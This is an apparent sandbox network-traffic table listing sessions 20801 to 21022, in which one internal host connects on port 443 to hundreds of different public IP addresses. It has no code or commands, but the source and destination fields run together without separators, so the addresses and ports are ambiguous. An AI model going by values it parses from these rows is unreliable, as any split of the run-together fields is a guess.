                                                20801192.168.2.235641071.52.8.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20802192.168.2.2342534216.8.73.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20803192.168.2.233365051.200.109.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20804192.168.2.2343332167.81.147.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20805192.168.2.2357598109.117.107.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20806192.168.2.2344860207.168.27.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20807192.168.2.235353447.69.225.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20808192.168.2.2332786132.134.171.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20809192.168.2.2358964185.137.10.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20810192.168.2.2335512130.99.91.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20811192.168.2.2343438131.8.57.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20812192.168.2.235699641.155.245.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20813192.168.2.2349748209.252.82.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20814192.168.2.2350184211.64.233.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20815192.168.2.234804078.177.111.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20816192.168.2.2344170157.84.45.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20817192.168.2.235144093.20.20.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20818192.168.2.234501898.90.33.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20819192.168.2.2335622116.218.96.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20820192.168.2.2359858137.211.255.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20821192.168.2.234200664.207.27.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20822192.168.2.233536062.99.16.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20823192.168.2.233360869.202.38.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20824192.168.2.2359908174.37.196.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20825192.168.2.2338332182.202.49.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20826192.168.2.2334210209.247.126.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20827192.168.2.2335430192.0.95.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20828192.168.2.235442662.139.242.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20829192.168.2.2348182123.88.235.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20830192.168.2.2348212141.23.151.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20831192.168.2.2353934118.245.251.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20832192.168.2.2346672139.202.132.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20833192.168.2.2350948203.62.82.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20834192.168.2.2335760114.79.186.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20835192.168.2.234029473.176.87.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20836192.168.2.235389495.165.161.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20837192.168.2.2341520209.95.223.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20838192.168.2.235189420.89.199.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20839192.168.2.235632824.242.78.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20840192.168.2.2342180168.117.109.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20841192.168.2.233534879.149.251.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20842192.168.2.235757866.250.186.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20843192.168.2.2358986218.46.192.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20844192.168.2.2334884196.229.227.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20845192.168.2.235141050.59.69.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20846192.168.2.2345698198.229.72.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20847192.168.2.235902686.254.12.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20848192.168.2.2336344197.252.222.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20849192.168.2.235945823.237.236.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20850192.168.2.2356792113.218.174.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20851192.168.2.234296032.44.204.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20852192.168.2.233292893.8.40.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20853192.168.2.235842673.27.94.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20854192.168.2.233546888.37.59.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20855192.168.2.235532057.252.32.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20856192.168.2.2346756163.252.55.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20857192.168.2.233482258.59.95.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20858192.168.2.2357968201.113.217.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20859192.168.2.2347058155.104.117.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20860192.168.2.2337892122.232.36.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20861192.168.2.2337268170.9.1.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20862192.168.2.235465488.38.146.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20863192.168.2.2342726196.83.60.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20864192.168.2.2336294148.5.245.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20865192.168.2.235327881.157.91.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20866192.168.2.2358646110.51.74.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20867192.168.2.2347078174.211.82.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20868192.168.2.235922651.234.54.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20869192.168.2.2343910178.158.62.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20870192.168.2.235504680.105.204.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20871192.168.2.2335890129.250.201.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20872192.168.2.2336836217.149.99.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20873192.168.2.2344140156.130.141.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20874192.168.2.2337596110.164.133.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20875192.168.2.233490888.24.246.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20876192.168.2.2355386206.203.214.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20877192.168.2.2338438103.88.102.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20878192.168.2.2344440107.204.169.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20879192.168.2.235369025.102.33.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20880192.168.2.2350402146.234.162.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20881192.168.2.2344372130.40.103.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20882192.168.2.2350286221.97.26.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20883192.168.2.234007820.28.154.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20884192.168.2.234312077.176.126.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20885192.168.2.2336142123.170.205.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20886192.168.2.235898685.150.140.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20887192.168.2.2352640130.31.1.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20888192.168.2.2348354183.210.54.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20889192.168.2.2341768192.200.12.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20890192.168.2.2353654170.248.164.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20891192.168.2.2336998124.150.178.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20892192.168.2.234219251.71.131.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20893192.168.2.2336172144.234.99.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20894192.168.2.2354920129.133.23.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20895192.168.2.235923269.195.23.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20896192.168.2.235931249.76.133.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20897192.168.2.233733225.38.216.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20898192.168.2.233582012.10.181.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20899192.168.2.2353136165.136.231.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20900192.168.2.2345890156.238.25.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20901192.168.2.2340242192.53.153.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20902192.168.2.233997440.26.179.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20903192.168.2.2346876176.227.37.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20904192.168.2.234997052.51.81.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20905192.168.2.235963683.122.112.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20906192.168.2.235681674.6.94.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20907192.168.2.2352268155.113.76.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20908192.168.2.2337002153.132.50.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20909192.168.2.2346040162.131.233.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20910192.168.2.2353722173.62.30.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20911192.168.2.235782627.37.69.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20912192.168.2.2340904210.8.165.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20913192.168.2.2342268186.194.140.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20914192.168.2.234428685.55.117.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20915192.168.2.2341324177.80.166.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20916192.168.2.2344832222.25.204.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20917192.168.2.2350054101.3.11.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20918192.168.2.2340688131.154.150.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20919192.168.2.233320479.245.173.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20920192.168.2.2352950180.138.68.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20921192.168.2.234720842.197.71.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20922192.168.2.2349854160.226.99.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20923192.168.2.2339636162.118.207.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20924192.168.2.2352668162.166.43.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20925192.168.2.2335676166.24.81.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20926192.168.2.2333566148.200.147.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20927192.168.2.2341282170.191.212.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20928192.168.2.234667641.91.165.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20929192.168.2.235722699.72.9.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20930192.168.2.2358140169.105.138.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20931192.168.2.2335020139.123.156.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20932192.168.2.23424145.107.102.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20933192.168.2.2341878172.177.8.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20934192.168.2.235235224.95.56.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20935192.168.2.2342316102.132.207.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20936192.168.2.233839277.103.30.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20937192.168.2.2342698154.89.28.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20938192.168.2.2354570204.96.143.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20939192.168.2.235322896.168.146.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20940192.168.2.2359066158.71.76.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20941192.168.2.2345112104.92.172.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20942192.168.2.235377662.129.183.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20943192.168.2.234940427.221.201.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20944192.168.2.234869492.65.238.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20945192.168.2.2356456182.254.15.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20946192.168.2.2350822219.52.58.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20947192.168.2.2346842151.44.123.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20948192.168.2.233365277.150.153.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20949192.168.2.2359710221.19.124.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20950192.168.2.235639844.103.202.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20951192.168.2.2334126161.219.194.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20952192.168.2.2341688139.220.35.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20953192.168.2.2344426207.110.240.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20954192.168.2.235158649.137.176.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20955192.168.2.233756890.12.215.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20956192.168.2.233812644.9.3.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20957192.168.2.2351442130.66.99.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20958192.168.2.2336138175.67.139.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20959192.168.2.234209623.199.13.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20960192.168.2.2358084108.48.97.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20961192.168.2.234508486.21.127.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20962192.168.2.2352086189.192.78.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20963192.168.2.2333416107.99.161.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20964192.168.2.234871676.71.199.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20965192.168.2.2336576108.224.28.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20966192.168.2.235911470.38.68.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20967192.168.2.2360860104.163.217.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20968192.168.2.2337928160.130.105.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20969192.168.2.234864232.24.79.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20970192.168.2.2344710216.49.218.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20971192.168.2.23523545.123.123.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20972192.168.2.23393941.85.169.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20973192.168.2.2341636143.234.25.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20974192.168.2.2345886165.82.124.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20975192.168.2.233489683.91.205.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20976192.168.2.2339294203.177.16.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20977192.168.2.2341288109.250.239.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20978192.168.2.2346694181.176.154.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20979192.168.2.234488699.160.187.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20980192.168.2.233720668.104.239.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20981192.168.2.233683257.222.66.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20982192.168.2.2354698204.102.77.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20983192.168.2.236034481.206.118.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20984192.168.2.2340944163.105.34.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20985192.168.2.234964097.120.18.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20986192.168.2.2337214157.218.247.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20987192.168.2.2355050187.183.124.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20988192.168.2.2345856146.100.219.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20989192.168.2.2351644121.143.47.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20990192.168.2.233345024.135.228.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20991192.168.2.23496482.101.100.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20992192.168.2.2335616132.2.23.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20993192.168.2.2343524170.166.243.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20994192.168.2.2352728210.59.133.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20995192.168.2.233293614.133.51.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20996192.168.2.233697099.140.147.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20997192.168.2.2348922105.77.150.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20998192.168.2.235601663.16.204.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20999192.168.2.2342292155.113.9.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21000192.168.2.2340020149.240.12.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21001192.168.2.2340450117.254.171.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21002192.168.2.2358720142.93.6.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21003192.168.2.2355626217.92.8.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21004192.168.2.235017066.83.67.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21005192.168.2.2340210198.227.94.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21006192.168.2.2353598178.51.123.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21007192.168.2.2344334106.85.240.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21008192.168.2.2351408193.33.10.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21009192.168.2.2353492162.108.142.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21010192.168.2.235131884.91.206.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21011192.168.2.2353132149.195.87.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21012192.168.2.2360970186.242.16.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21013192.168.2.235401017.227.199.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21014192.168.2.235181439.145.108.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21015192.168.2.234063286.8.98.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21016192.168.2.2343958153.76.75.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21017192.168.2.233921253.227.240.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21018192.168.2.233282225.61.33.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21019192.168.2.2338916163.55.139.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21020192.168.2.2346750211.166.203.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21021192.168.2.2344850109.52.77.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21022192.168.2.2357914190.229.234.48443
                                                TimestampBytes transferredDirectionData


